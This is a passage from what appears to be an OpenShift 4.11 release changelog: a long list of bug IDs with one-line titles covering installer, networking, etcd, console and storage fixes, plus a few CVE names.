"PipelineRuns" and on Repository Details page it's "Pipeline Runs". 2073373 - Update azure-disk-csi-driver to 1.16.0 2073378 - failed egressIP assignment - cloud-network-config-controller does not delete failed cloudprivateipconfig 2073398 - machine-api-provider-openstack does not clean up OSP ports after failed server provisioning 2073436 - Update azure-file-csi-driver to v1.14.0 2073437 - Topology performance: Firehose/useK8sWatchResources cache can return unexpected data format if isList differs on multiple calls 2073452 - [sig-network] pods should successfully create sandboxes by other - failed (add) 2073473 - [OVN SCALE][ovn-northd] Unnecessary SB record no-op changes added to SB transaction. 2073522 - Update ibm-vpc-block-csi-driver to v4.2.0 2073525 - Update vpc-node-label-updater to v4.1.2 2073901 - Installation failed due to etcd operator Err:DefragControllerDegraded: failed to dial endpoint https://10.0.0.7:2379 with maintenance client: context canceled 2073937 - Invalid retention time and invalid retention size should be validated at one place and have error log in one place for UMW 2073938 - APIRemovedInNextEUSReleaseInUse alert for runtimeclasses 2073945 - APIRemovedInNextEUSReleaseInUse alert for podsecuritypolicies 2073972 - Invalid retention time and invalid retention size should be validated at one place and have error log in one place for platform monitoring 2074009 - [OVN] ovn-northd doesn't clean Chassis_Private record after scale down to 0 a machineSet 2074031 - Admins should be able to tune garbage collector aggressiveness (GOGC) for kube-apiserver if necessary 2074062 - Node Tuning Operator(NTO) - Cloud provider profile rollback doesn't work well 2074084 - CMO metrics not visible in the OCP webconsole UI 2074100 - CRD filtering according to name broken 2074210 - asia-south2, australia-southeast2, and southamerica-west1Missing from GCP regions 2074237 - oc new-app --image-stream flag behavior is unclear 2074243 - DefaultPlacement API allow empty enum value and remove default 2074447 - cluster-dashboard: CPU Utilisation iowait and steal 2074465 - PipelineRun fails in import from Git flow if "main" branch is default 2074471 - Cannot delete namespace with a LB type svc and Kuryr when ExternalCloudProvider is enabled 2074475 - [e2e][automation] kubevirt plugin cypress tests fail 2074483 - coreos-installer doesnt work on Dell machines 2074544 - e2e-metal-ipi-ovn-ipv6 failing due to recent CEO changes 2074585 - MCG standalone deployment page goes blank when the KMS option is enabled 2074606 - occm does not have permissions to annotate SVC objects 2074612 - Operator fails to install due to service name lookup failure 2074613 - nodeip-configuration container incorrectly attempts to relabel /etc/systemd/system 2074635 - Unable to start Web Terminal after deleting existing instance 2074659 - AWS installconfig ValidateForProvisioning always provides blank values to validate zone records 2074706 - Custom EC2 endpoint is not considered by AWS EBS CSI driver 2074710 - Transition to go-ovirt-client 2074756 - Namespace column provide wrong data in ClusterRole Details -> Rolebindings tab 2074767 - Metrics page show incorrect values due to metrics level config 2074807 - NodeFilesystemSpaceFillingUp alert fires even before kubelet GC kicks in 2074902 -oc debug node/nodename ? chroot /host somecommandshould exit with non-zero when the sub-command failed 2075015 - etcd-guard connection refused event repeating pathologically (payload blocking) 2075024 - Metal upgrades permafailing on metal3 containers crash looping 2075050 - oc-mirror fails to calculate between two channels with different prefixes for the same version of OCP 2075091 - Symptom Detection.Undiagnosed panic detected in pod 2075117 - Developer catalog: Order dropdown (A-Z, Z-A) is miss-aligned (in a separate row) 2075149 - Trigger Translations When Extensions Are Updated 2075189 - Imports from dynamic-plugin-sdk lead to failed module resolution errors 2075459 - Set up cluster on aws with rootvolumn io2 failed due to no iops despite it being configured 2075475 - OVN-Kubernetes: egress router pod (redirect mode), access from pod on different worker-node (redirect) doesn't work 2075478 - Bump documentationBaseURL to 4.11 2075491 - nmstate operator cannot be upgraded on SNO 2075575 - Local Dev Env - Prometheus 404 Call errors spam the console 2075584 - improve clarity of build failure messages when using csi shared resources but tech preview is not enabled 2075592 - Regression - Top of the web terminal drawer is missing a stroke/dropshadow 2075621 - Cluster upgrade.[sig-mco] Machine config pools complete upgrade 2075647 - 'oc adm upgrade ...' POSTs ClusterVersion, clobbering any unrecognized spec properties 2075671 - Cluster Ingress Operator K8S API cache contains duplicate objects 2075778 - Fix failing TestGetRegistrySamples test 2075873 - Bump recommended FCOS to 35.20220327.3.0 2076193 - oc patch command for the liveness probe and readiness probe parameters of an OpenShift router deployment doesn't take effect 2076270 - [OCPonRHV] MachineSet scale down operation fails to delete the worker VMs 2076277 - [RFE] [OCPonRHV] Add storage domain ID valueto Compute/ControlPlain section in the machine object 2076290 - PTP operator readme missing documentation on BC setup via PTP config 2076297 - Router process ignores shutdown signal while starting up 2076323 - OLM blocks all operator installs if an openshift-marketplace catalogsource is unavailable 2076355 - The KubeletConfigController wrongly process multiple confs for a pool after having kubeletconfig in bootstrap 2076393 - [VSphere] survey fails to list datacenters 2076521 - Nodes in the same zone are not updated in the right order 2076527 - Pipeline Builder: Make unnecessary tekton hub API calls when the user types 'too fast' 2076544 - Whitespace (padding) is missing after an PatternFly update, already in 4.10 2076553 - Project access view replace group ref with user ref when updating their Role 2076614 - Missing Events component from the SDK API 2076637 - Configure metrics for vsphere driver to be reported 2076646 - openshift-install destroy unable to delete PVC disks in GCP if cluster identifier is longer than 22 characters 2076793 - CVO exits upgrade immediately rather than waiting for etcd backup 2076831 - [ocp4.11]Mem/cpu high utilization by apiserver/etcd for cluster stayed 10 hours 2076877 - network operator tracker to switch to use flowcontrol.apiserver.k8s.io/v1beta2 instead v1beta1 to be deprecated in k8s 1.26 2076880 - OKD: add cluster domain to the uploaded vm configs so that 30-local-dns-prepender can use it 2076975 - Metric unset during static route conversion in configure-ovs.sh 2076984 - TestConfigurableRouteNoConsumingUserNoRBAC fails in CI 2077050 - OCP should default to pd-ssd disk type on GCP 2077150 - Breadcrumbs on a few screens don't have correct top margin spacing 2077160 - Update owners for openshift/cluster-etcd-operator 2077357 - [release-4.11] 200ms packet delay with OVN controller turn on 2077373 - Accessibility warning on developer perspective 2077386 - Import page shows untranslated values for the route advanced routing>security options (devconsole~Edge) 2077457 - failure in test case "[sig-network][Feature:Router] The HAProxy router should serve the correct routes when running with the haproxy config manager" 2077497 - Rebase etcd to 3.5.3 or later 2077597 - machine-api-controller is not taking the proxy configuration when it needs to reach the RHV API 2077599 - OCP should alert users if they are on vsphere version <7.0.2 2077662 - AWS Platform Provisioning Check incorrectly identifies record as part of domain of cluster 2077797 - LSO pods don't have any resource requests 2077851 - "make vendor" target is not working 2077943 - If there is a service with multiple ports, and the route uses 8080, when editing the 8080 port isn't replaced, but a random port gets replaced and 8080 still stays 2077994 - Publish RHEL CoreOS AMIs in AWS ap-southeast-3 region 2078013 - drop multipathd.socket workaround 2078375 - When using the wizard with template using data source the resulting vm use pvc source 2078396 - [OVN AWS] EgressIP was not balanced to another egress node after original node was removed egress label 2078431 - [OCPonRHV] - ERROR failed to instantiate provider "openshift/local/ovirt" to obtain schema: ERROR fork/exec 2078526 - Multicast breaks after master node reboot/sync 2078573 - SDN CNI -Fail to create nncp when vxlan is up 2078634 - CRI-O not killing Calico CNI stalled (zombie) processes. 2078698 - search box may not completely remove content 2078769 - Different not translated filter group names (incl. Secret, Pipeline, PIpelineRun) 2078778 - [4.11] oc get ValidatingWebhookConfiguration,MutatingWebhookConfiguration fails and caused ?apiserver panic'd...http2: panic serving xxx.xx.xxx.21:49748: cannot deep copy int? when AllRequestBodies audit-profile is used. 2078781 - PreflightValidation does not handle multiarch images 2078866 - [BM][IPI] Installation with bonds fail - DaemonSet "openshift-ovn-kubernetes/ovnkube-node" rollout is not making progress 2078875 - OpenShift Installer fail to remove Neutron ports 2078895 - [OCPonRHV]-"cow" unsupported value in format field in install-config.yaml 2078910 - CNO spitting out ".spec.groups[0].rules[4].runbook_url: field not declared in schema" 2078945 - Ensure only one apiserver-watcher process is active on a node. 2078954 - network-metrics-daemon makes costly global pod list calls scaling per node 2078969 - Avoid update races between old and new NTO operands during cluster upgrades 2079012 - egressIP not migrated to correct workers after deleting machineset it was assigned 2079062 - Test for console demo plugin toast notification needs to be increased for ci testing 2079197 - [RFE] alert when more than one default storage class is detected 2079216 - Partial cluster update reference doc link returns 404 2079292 - containers prometheus-operator/kube-rbac-proxy violate PodSecurity 2079315 - (release-4.11) Gather ODF config data with Insights 2079422 - Deprecated 1.25 API call 2079439 - OVN Pods Assigned Same IP Simultaneously 2079468 - Enhance the waitForIngressControllerCondition for better CI results 2079500 - okd-baremetal-install uses fcos for bootstrap but rhcos for cluster 2079610 - Opeatorhub status shows errors 2079663 - change default image features in RBD storageclass 2079673 - Add flags to disable migrated code 2079685 - Storageclass creation page with "Enable encryption" is not displaying saved KMS connection details when vaulttenantsa details are available in csi-kms-details config 2079724 - cluster-etcd-operator - disable defrag-controller as there is unpredictable impact on large OpenShift Container Platform 4 - Cluster 2079788 - Operator restarts while applying the acm-ice example 2079789 - cluster drops ImplicitlyEnabledCapabilities during upgrade 2079803 - Upgrade-triggered etcd backup will be skip during serial upgrade 2079805 - Secondary scheduler operator should comply to restricted pod security level 2079818 - Developer catalog installation overlay (modal?) shows a duplicated padding 2079837 - [RFE] Hub/Spoke example with daemonset 2079844 - EFS cluster csi driver status stuck in AWSEFSDriverCredentialsRequestControllerProgressing with sts installation 2079845 - The Event Sinks catalog page now has a blank space on the left 2079869 - Builds for multiple kernel versions should be ran in parallel when possible 2079913 - [4.10] APIRemovedInNextEUSReleaseInUse alert for OVN endpointslices 2079961 - The search results accordion has no spacing between it and the side navigation bar. 2079965 - [rebase v1.24] [sig-node] PodOSRejection [NodeConformance] Kubelet should reject pod when the node OS doesn't match pod's OS [Suite:openshift/conformance/parallel] [Suite:k8s] 2080054 - TAGS arg for installer-artifacts images is not propagated to build images 2080153 - aws-load-balancer-operator-controller-manager pod stuck in ContainerCreating status 2080197 - etcd leader changes produce test churn during early stage of test 2080255 - EgressIP broken on AWS with OpenShiftSDN / latest nightly build 2080267 - [Fresh Installation] Openshift-machine-config-operator namespace is flooded with events related to clusterrole, clusterrolebinding 2080279 - CVE-2022-29810 go-getter: writes SSH credentials into logfile, exposing sensitive credentials to local uses 2080379 - Group all e2e tests as parallel or serial 2080387 - Visual connector not appear between the node if a node get created using "move connector" to a different application 2080416 - oc bash-completion problem 2080429 - CVO must ensure non-upgrade related changes are saved when desired payload fails to load 2080446 - Sync ironic images with latest bug fixes packages 2080679 - [rebase v1.24] [sig-cli] test failure 2080681 - [rebase v1.24] [sig-cluster-lifecycle] CSRs from machines that are not recognized by the cloud provider are not approved [Suite:openshift/conformance/parallel] 2080687 - [rebase v1.24] [sig-network][Feature:Router] tests are failing 2080873 - Topology graph crashes after update to 4.11 when Layout 2 (ColaForce) was selected previously 2080964 - Cluster operator special-resource-operator is always in Failing state with reason: "Reconciling simple-kmod" 2080976 - Avoid hooks config maps when hooks are empty 2081012 - [rebase v1.24] [sig-devex][Feature:OpenShiftControllerManager] TestAutomaticCreationOfPullSecrets [Suite:openshift/conformance/parallel] 2081018 - [rebase v1.24] [sig-imageregistry][Feature:Image] oc tag should work when only imagestreams api is available 2081021 - [rebase v1.24] [sig-api-machinery] API data in etcd should be stored at the correct location and version for all resources 2081062 - Unrevert RHCOS back to 8.6 2081067 - admin dev-console /settings/cluster should point out history may be excerpted 2081069 - [sig-network] pods should successfully create sandboxes by adding pod to network 2081081 - PreflightValidation "odd number of arguments passed as key-value pairs for logging" error 2081084 - [rebase v1.24] [sig-instrumentation] Events API should ensure that an event can be fetched, patched, deleted, and listed 2081087 - [rebase v1.24] [sig-auth] ServiceAccounts should allow opting out of API token automount 2081119 -oc explainoutput of default overlaySize is outdated 2081172 - MetallLB: YAML view in webconsole does not show all the available key value pairs of all the objects 2081201 - cloud-init User check for Windows VM refuses to accept capitalized usernames 2081447 - Ingress operator performs spurious updates in response to API's defaulting of router deployment's router container's ports' protocol field 2081562 - lifecycle.posStart hook does not have network connectivity. 2081685 - Typo in NNCE Conditions 2081743 - [e2e] tests failing 2081788 - MetalLB: the crds are not validated until metallb is deployed 2081821 - SpecialResourceModule CRD is not installed after deploying SRO operator using brew bundle image via OLM 2081895 - Use the managed resource (and not the manifest) for resource health checks 2081997 - disconnected insights operator remains degraded after editing pull secret 2082075 - Removing huge amount of ports takes a lot of time. 2082235 - CNO exposes a generic apiserver that apparently does nothing 2082283 - Transition to new oVirt Terraform provider 2082360 - OCP 4.10.4, CNI: SDN; Whereabouts IPAM: Duplicate IP address with bond-cni 2082380 - [4.10.z] customize wizard is crashed 2082403 - [LSO] No new build local-storage-operator-metadata-container created 2082428 - oc patch healthCheckInterval with invalid "5 s" to the ingress-controller successfully 2082441 - [UPI] aws-load-balancer-operator-controller-manager failed to get VPC ID in UPI on AWS 2082492 - [IPI IBM]Can't create image-registry-private-configuration secret with error "specified resource key credentials does not contain HMAC keys" 2082535 - [OCPonRHV]-workers are cloned when "clone: false" is specified in install-config.yaml 2082538 - apirequests limits of Cluster CAPI Operator are too low for GCP platform 2082566 - OCP dashboard fails to load when the query to Prometheus takes more than 30s to return 2082604 - [IBMCloud][x86_64] IBM VPC does not properly support RHCOS Custom Image tagging 2082667 - No new machines provisioned while machineset controller drained old nodes for change to machineset 2082687 - [IBM Cloud][x86_64][CCCMO] IBM x86_64 CCM using unsupported --port argument 2082763 - Cluster install stuck on the applying for operatorhub "cluster" 2083149 - "Update blocked" label incorrectly displays on new minor versions in the "Other available paths" modal 2083153 - Unable to use application credentials for Manila PVC creation on OpenStack 2083154 - Dynamic plugin sdk tsdoc generation does not render docs for parameters 2083219 - DPU network operator doesn't deal with c1... inteface names 2083237 - [vsphere-ipi] Machineset scale up process delay 2083299 - SRO does not fetch mirrored DTK images in disconnected clusters 2083445 - [FJ OCP4.11 Bug]: RAID setting during IPI cluster deployment fails if iRMC port number is specified 2083451 - Update external serivces URLs to console.redhat.com 2083459 - Make numvfs > totalvfs error message more verbose 2083466 - Failed to create clusters on AWS C2S/SC2S due to image-registry MissingEndpoint error 2083514 - Operator ignores managementState Removed 2083641 - OpenShift Console Knative Eventing ContainerSource generates wrong api version when pointed to k8s Service 2083756 - Linkify not upgradeable message on ClusterSettings page 2083770 - Release image signature manifest filename extension is yaml 2083919 - openshift4/ose-operator-registry:4.10.0 having security vulnerabilities 2083942 - Learner promotion can temporarily fail with rpc not supported for learner errors 2083964 - Sink resources dropdown is not persisted in form yaml switcher in event source creation form 2083999 - "--prune-over-size-limit" is not working as expected 2084079 - prometheus route is not updated to "path: /api" after upgrade from 4.10 to 4.11 2084081 - nmstate-operator installed cluster on POWER shows issues while adding new dhcp interface 2084124 - The Update cluster modal includes a broken link 2084215 - Resource configmap "openshift-machine-api/kube-rbac-proxy" is defined by 2 manifests 2084249 - panic in ovn pod from an e2e-aws-single-node-serial nightly run 2084280 - GCP API Checks Fail if non-required APIs are not enabled 2084288 - "alert/Watchdog must have no gaps or changes" failing after bump 2084292 - Access to dashboard resources is needed in dynamic plugin SDK 2084331 - Resource with multiple capabilities included unless all capabilities are disabled 2084433 - Podsecurity violation error getting logged for ingresscontroller during deployment. 2084438 - Change Ping source spec.jsonData (deprecated) field to spec.data 2084441 - [IPI-Azure]fail to check the vm capabilities in install cluster 2084459 - Topology list view crashes when switching from chart view after moving sink from knative service to uri 2084463 - 5 control plane replica tests fail on ephemeral volumes 2084539 - update azure arm templates to support customer provided vnet 2084545 - [rebase v1.24] cluster-api-operator causes all techpreview tests to fail 2084580 - [4.10] No cluster name sanity validation - cluster name with a dot (".") character 2084615 - Add to navigation option on search page is not properly aligned 2084635 - PipelineRun creation from the GUI for a Pipeline with 2 workspaces hardcode the PVC storageclass 2084732 - A special resource that was created in OCP 4.9 can't be deleted after an upgrade to 4.10 2085187 - installer-artifacts fails to build with go 1.18 2085326 - kube-state-metrics is tripping APIRemovedInNextEUSReleaseInUse 2085336 - [IPI-Azure] Fail to create the worker node which HyperVGenerations is V2 or V1 and vmNetworkingType is Accelerated 2085380 - [IPI-Azure] Incorrect error prompt validate VM image and instance HyperV gen match when install cluster 2085407 - There is no Edit link/icon for labels on Node details page 2085721 - customization controller image name is wrong 2086056 - Missing doc for OVS HW offload 2086086 - Update Cluster Sample Operator dependencies and libraries for OCP 4.11 2086092 - update kube to v.24 2086143 - CNO uses too much memory 2086198 - Cluster CAPI Operator creates unnecessary defaulting webhooks 2086301 - kubernetes nmstate pods are not running after creating instance 2086408 - Podsecurity violation error getting logged for externalDNS operand pods during deployment 2086417 - Pipeline created from add flow has GIT Revision as required field 2086437 - EgressQoS CRD not available 2086450 - aws-load-balancer-controller-cluster pod logged Podsecurity violation error during deployment 2086459 - oc adm inspect fails when one of resources not exist 2086461 - CNO probes MTU unnecessarily in Hypershift, making cluster startup take too long 2086465 - External identity providers should log login attempts in the audit trail 2086469 - No data about title 'API Request Duration by Verb - 99th Percentile' display on the dashboard 'API Performance' 2086483 - baremetal-runtimecfg k8s dependencies should be on a par with 1.24 rebase 2086505 - Update oauth-server images to be consistent with ART 2086519 - workloads must comply to restricted security policy 2086521 - Icons of Knative actions are not clearly visible on the context menu in the dark mode 2086542 - Cannot create service binding through drag and drop 2086544 - ovn-k master daemonset on hypershift shouldn't log token 2086546 - Service binding connector is not visible in the dark mode 2086718 - PowerVS destroy code does not work 2086728 - [hypershift] Move drain to controller 2086731 - Vertical pod autoscaler operator needs a 4.11 bump 2086734 - Update csi driver images to be consistent with ART 2086737 - cloud-provider-openstack rebase to kubernetes v1.24 2086754 - Cluster resource override operator needs a 4.11 bump 2086759 - [IPI] OCP-4.11 baremetal - boot partition is not mounted on temporary directory 2086791 - Azure: Validate UltraSSD instances in multi-zone regions 2086851 - pods with multiple external gateways may only be have ECMP routes for one gateway 2086936 - vsphere ipi should use cores by default instead of sockets 2086958 - flaky e2e in kube-controller-manager-operator TestPodDisruptionBudgetAtLimitAlert 2086959 - flaky e2e in kube-controller-manager-operator TestLogLevel 2086962 - oc-mirror publishes metadata with --dry-run when publishing to mirror 2086964 - oc-mirror fails on differential run when mirroring a package with multiple channels specified 2086972 - oc-mirror does not error invalid metadata is passed to the describe command 2086974 - oc-mirror does not work with headsonly for operator 4.8 2087024 - The oc-mirror result mapping.txt is not correct , can?t be used byoc image mirrorcommand 2087026 - DTK's imagestream is missing from OCP 4.11 payload 2087037 - Cluster Autoscaler should use K8s 1.24 dependencies 2087039 - Machine API components should use K8s 1.24 dependencies 2087042 - Cloud providers components should use K8s 1.24 dependencies 2087084 - remove unintentional nic support 2087103 - "Updating to release image" from 'oc' should point out that the cluster-version operator hasn't accepted the update 2087114 - Add simple-procfs-kmod in modprobe example in README.md 2087213 - Spoke BMH stuck "inspecting" when deployed via ZTP in 4.11 OCP hub 2087271 - oc-mirror does not check for existing workspace when performing mirror2mirror synchronization 2087556 - Failed to render DPU ovnk manifests 2087579 ---keep-manifest-list=truedoes not work foroc adm release new, only pick up the linux/amd64 manifest from the manifest list 2087680 - [Descheduler] Sync with sigs.k8s.io/descheduler 2087684 - KCMO should not be able to apply LowUpdateSlowReaction from Default WorkerLatencyProfile 2087685 - KASO should not be able to apply LowUpdateSlowReaction from Default WorkerLatencyProfile 2087687 - MCO does not generate event when user applies Default -> LowUpdateSlowReaction WorkerLatencyProfile 2087764 - Rewrite the registry backend will hit error 2087771 - [tracker] NetworkManager 1.36.0 loses DHCP lease and doesn't try again 2087772 - Bindable badge causes some layout issues with the side panel of bindable operator backed services 2087942 - CNO references images that are divergent from ART 2087944 - KafkaSink Node visualized incorrectly 2087983 - remove etcd_perf before restore 2087993 - PreflightValidation many "msg":"TODO: preflight checks" in the operator log 2088130 - oc-mirror init does not allow for automated testing 2088161 - Match dockerfile image name with the name used in the release repo 2088248 - Create HANA VM does not use values from customized HANA templates 2088304 - ose-console: enable source containers for open source requirements 2088428 - clusteroperator/baremetal stays in progressing: Applying metal3 resources state on a fresh install 2088431 - AvoidBuggyIPs field of addresspool should be removed 2088483 - oc adm catalog mirror returns 0 even if there are errors 2088489 - Topology list does not allow selecting an application group anymore (again) 2088533 - CRDs for openshift.io should have subresource.status failes on sharedconfigmaps.sharedresource and sharedsecrets.sharedresource 2088535 - MetalLB: Enable debug log level for downstream CI 2088541 - Default CatalogSources in openshift-marketplace namespace keeps throwing pod security admission warningswould violate PodSecurity "restricted:v1.24"2088561 - BMH unable to start inspection: File name too long 2088634 - oc-mirror does not fail when catalog is invalid 2088660 - Nutanix IPI installation inside container failed 2088663 - Better to change the default value of --max-per-registry to 6 2089163 - NMState CRD out of sync with code 2089191 - should remove grafana from cluster-monitoring-config configmap in hypershift cluster 2089224 - openshift-monitoring/cluster-monitoring-config configmap always revert to default setting 2089254 - CAPI operator: Rotate token secret if its older than 30 minutes 2089276 - origin tests for egressIP and azure fail 2089295 - [Nutanix]machine stuck in Deleting phase when delete a machineset whose replicas>=2 and machine is Provisioning phase on Nutanix 2089309 - [OCP 4.11] Ironic inspector image fails to clean disks that are part of a multipath setup if they are passive paths 2089334 - All cloud providers should use service account credentials 2089344 - Failed to deploy simple-kmod 2089350 - Rebase sdn to 1.24 2089387 - LSO not taking mpath. ignoring device 2089392 - 120 node baremetal upgrade from 4.9.29 --> 4.10.13 crashloops on machine-approver 2089396 - oc-mirror does not show pruned image plan 2089405 - New topology package shows gray build icons instead of green/red icons for builds and pipelines 2089419 - do not block 4.10 to 4.11 upgrades if an existing CSI driver is found. Instead, warn about presence of third party CSI driver 2089488 - Special resources are missing the managementState field 2089563 - Update Power VS MAPI to use api's from openshift/api repo 2089574 - UWM prometheus-operator pod can't start up due to no master node in hypershift cluster 2089675 - Could not move Serverless Service without Revision (or while starting?) 2089681 - [Hypershift] EgressIP doesn't work in hypershift guest cluster 2089682 - Installer expects all nutanix subnets to have a cluster reference which is not the case for e.g. overlay networks 2089687 - alert message of MCDDrainError needs to be updated for new drain controller 2089696 - CR reconciliation is stuck in daemonset lifecycle 2089716 - [4.11][reliability]one worker node became NotReady on which ovnkube-node pod's memory increased sharply 2089719 - acm-simple-kmod fails to build 2089720 - [Hypershift] ICSP doesn't work for the guest cluster 2089743 - acm-ice fails to deploy: helm chart does not appear to be a gzipped archive 2089773 - Pipeline status filter and status colors doesn't work correctly with non-english languages 2089775 - keepalived can keep ingress VIP on wrong node under certain circumstances 2089805 - Config duration metrics aren't exposed 2089827 - MetalLB CI - backward compatible tests are failing due to the order of delete 2089909 - PTP e2e testing not working on SNO cluster 2089918 - oc-mirror skip-missing still returns 404 errors when images do not exist 2089930 - Bump OVN to 22.06 2089933 - Pods do not post readiness status on termination 2089968 - Multus CNI daemonset should use hostPath mounts with type: directory 2089973 - bump libs to k8s 1.24 for OCP 4.11 2089996 - Unnecessary yarn install runs in e2e tests 2090017 - Enable source containers to meet open source requirements 2090049 - destroying GCP cluster which has a compute node without infra id in name would fail to delete 2 k8s firewall-rules and VPC network 2090092 - Will hit error if specify the channel not the latest 2090151 - [RHEL scale up] increase the wait time so that the node has enough time to get ready 2090178 - VM SSH command generated by UI points at api VIP 2090182 - [Nutanix]Create a machineset with invalid image, machine stuck in "Provisioning" phase 2090236 - Only reconcile annotations and status for clusters 2090266 - oc adm release extract is failing on mutli arch image 2090268 - [AWS EFS] Operator not getting installed successfully on Hypershift Guest cluster 2090336 - Multus logging should be disabled prior to release 2090343 - Multus debug logging should be enabled temporarily for debugging podsandbox creation failures. 2090358 - Initiating drain log message is displayed before the drain actually starts 2090359 - Nutanix mapi-controller: misleading error message when the failure is caused by wrong credentials 2090405 - [tracker] weird port mapping with asymmetric traffic [rhel-8.6.0.z] 2090430 - gofmt code 2090436 - It takes 30min-60min to update the machine count in custom MachineConfigPools (MCPs) when a node is removed from the pool 2090437 - Bump CNO to k8s 1.24 2090465 - golang version mismatch 2090487 - Change default SNO Networking Type and disallow OpenShiftSDN a supported networking Type 2090537 - failure in ovndb migration when db is not ready in HA mode 2090549 - dpu-network-operator shall be able to run on amd64 arch platform 2090621 - Metal3 plugin does not work properly with updated NodeMaintenance CRD 2090627 - Git commit and branch are empty in MetalLB log 2090692 - Bump to latest 1.24 k8s release 2090730 - must-gather should include multus logs. 2090731 - nmstate deploys two instances of webhook on a single-node cluster 2090751 - oc image mirror skip-missing flag does not skip images 2090755 - MetalLB: BGPAdvertisement validation allows duplicate entries for ip pool selector, ip address pools, node selector and bgp peers 2090774 - Add Readme to plugin directory 2090794 - MachineConfigPool cannot apply a configuration after fixing the pods that caused a drain alert 2090809 - gm.ClockClass invalid syntax parse error in linux ptp daemon logs 2090816 - OCP 4.8 Baremetal IPI installation failure: "Bootstrap failed to complete: timed out waiting for the condition" 2090819 - oc-mirror does not catch invalid registry input when a namespace is specified 2090827 - Rebase CoreDNS to 1.9.2 and k8s 1.24 2090829 - Bump OpenShift router to k8s 1.24 2090838 - Flaky test: ignore flapping host interface 'tunbr' 2090843 - addLogicalPort() performance/scale optimizations 2090895 - Dynamic plugin nav extension "startsWith" property does not work 2090929 - [etcd] cluster-backup.sh script has a conflict to use the '/etc/kubernetes/static-pod-certs' folder if a custom API certificate is defined 2090993 - [AI Day2] Worker node overview page crashes in Openshift console with TypeError 2091029 - Cancel rollout action only appears when rollout is completed 2091030 - Some BM may fail booting with default bootMode strategy 2091033 - [Descheduler]: provide ability to override included/excluded namespaces 2091087 - ODC Helm backend Owners file needs updates 2091106 - Dependabot alert: Unhandled exception in gopkg.in/yaml.v3 2091142 - Dependabot alert: Unhandled exception in gopkg.in/yaml.v3 2091167 - IPsec runtime enabling not work in hypershift 2091218 - Update Dev Console Helm backend to use helm 3.9.0 2091433 - Update AWS instance types 2091542 - Error Loading/404 not found page shown after clicking "Current namespace only" 2091547 - Internet connection test with proxy permanently fails 2091567 - oVirt CSI driver should use latest go-ovirt-client 2091595 - Alertmanager configuration can't use OpsGenie's entity field when AlertmanagerConfig is enabled 2091599 - PTP Dual Nic | Extend Events 4.11 - Up/Down master interface affects all the other interface in the same NIC accoording the events and metric 2091603 - WebSocket connection restarts when switching tabs in WebTerminal 2091613 - simple-kmod fails to build due to missing KVC 2091634 - OVS 2.15 stops handling traffic once ovs-dpctl(2.17.2) is used against it 2091730 - MCO e2e tests are failing with "No token found in openshift-monitoring secrets" 2091746 - "Oh no! Something went wrong" shown after user creates MCP without 'spec' 2091770 - CVO gets stuck downloading an upgrade, with the version pod complaining about invalid options 2091854 - clusteroperator status filter doesn't match all values in Status column 2091901 - Log stream paused right after updating log lines in Web Console in OCP4.10 2091902 - unable to retrieve the complete list of server APIs: metrics.k8s.io/v1beta1: the server has received too many requests and has asked us to try again later 2091990 - wrong external-ids for ovn-controller lflow-cache-limit-kb 2092003 - PR 3162 | BZ 2084450 - invalid URL schema for AWS causes tests to perma fail and break the cloud-network-config-controller 2092041 - Bump cluster-dns-operator to k8s 1.24 2092042 - Bump cluster-ingress-operator to k8s 1.24 2092047 - Kube 1.24 rebase for cloud-network-config-controller 2092137 - Search doesn't show all entries when name filter is cleared 2092296 - Change Default MachineCIDR of Power VS Platform from 10.x to 192.168.0.0/16 2092390 - [RDR] [UI] Multiple instances of Object Bucket, Object Bucket Claims and 'Overview' tab is present under Storage section on the Hub cluster when navigated back from the Managed cluster using the Hybrid console dropdown 2092395 - etcdHighNumberOfFailedGRPCRequests alerts with wrong results 2092408 - Wrong icon is used in the virtualization overview permissions card 2092414 - In virtualization overview "running vm per templates" template list can be improved 2092442 - Minimum time between drain retries is not the expected one 2092464 - marketplace catalog defaults to v4.10 2092473 - libovsdb performance backports 2092495 - ovn: use up to 4 northd threads in non-SNO clusters 2092502 - [azure-file-csi-driver] Stop shipping a NFS StorageClass 2092509 - Invalid memory address error if non existing caBundle is configured in DNS-over-TLS using ForwardPlugins 2092572 - acm-simple-kmod chart should create the namespace on the spoke cluster 2092579 - Don't retry pod deletion if objects are not existing 2092650 - [BM IPI with Provisioning Network] Worker nodes are not provisioned: ironic-agent is stuck before writing into disks 2092703 - Incorrect mount propagation information in container status 2092815 - can't delete the unwanted image from registry by oc-mirror 2092851 - [Descheduler]: allow to customize the LowNodeUtilization strategy thresholds 2092867 - make repository name unique in acm-ice/acm-simple-kmod examples 2092880 - etcdHighNumberOfLeaderChanges returns incorrect number of leadership changes 2092887 - oc-mirror list releases command uses filter-options flag instead of filter-by-os 2092889 - Incorrect updating of EgressACLs using direction "from-lport" 2092918 - CVE-2022-30321 go-getter: unsafe download (issue 1 of 3) 2092923 - CVE-2022-30322 go-getter: unsafe download (issue 2 of 3) 2092925 - CVE-2022-30323 go-getter: unsafe download (issue 3 of 3) 2092928 - CVE-2022-26945 go-getter: command injection vulnerability 2092937 - WebScale: OVN-k8s forwarding to external-gw over the secondary interfaces failing 2092966 - [OCP 4.11] [azure] /etc/udev/rules.d/66-azure-storage.rules missing from initramfs 2093044 - Azure machine-api-provider-azure Availability Set Name Length Limit 2093047 - Dynamic Plugins: Generated API markdown duplicatescheckAccessanduseAccessReviewdoc 2093126 - [4.11] Bootimage bump tracker 2093236 - DNS operator stopped reconciling after 4.10 to 4.11 upgrade | 4.11 nightly to 4.11 nightly upgrade 2093288 - Default catalogs fails liveness/readiness probes 2093357 - Upgrading sno spoke with acm-ice, causes the sno to get unreachable 2093368 - Installer orphans FIPs created for LoadBalancer Services oncluster destroy2093396 - Remove node-tainting for too-small MTU 2093445 - ManagementState reconciliation breaks SR 2093454 - Router proxy protocol doesn't work with dual-stack (IPv4 and IPv6) clusters 2093462 - Ingress Operator isn't reconciling the ingress cluster operator object 2093586 - Topology: Ctrl+space opens the quick search modal, but doesn't close it again 2093593 - Import from Devfile shows configuration options that shoudn't be there 2093597 - Import: Advanced option sentence is splited into two parts and headlines has no padding 2093600 - Project access tab should apply new permissions before it delete old ones 2093601 - Project access page doesn't allow the user to update the settings twice (without manually reload the content) 2093783 - Should bump cluster-kube-descheduler-operator to kubernetes version V1.24 2093797 - 'oc registry login' with serviceaccount function need update 2093819 - An etcd member for a new machine was never added to the cluster 2093930 - Gather console helm install totals metric 2093957 - Oc-mirror write dup metadata to registry backend 2093986 - Podsecurity violation error getting logged for pod-identity-webhook 2093992 - Cluster version operator acknowledges upgrade failing on 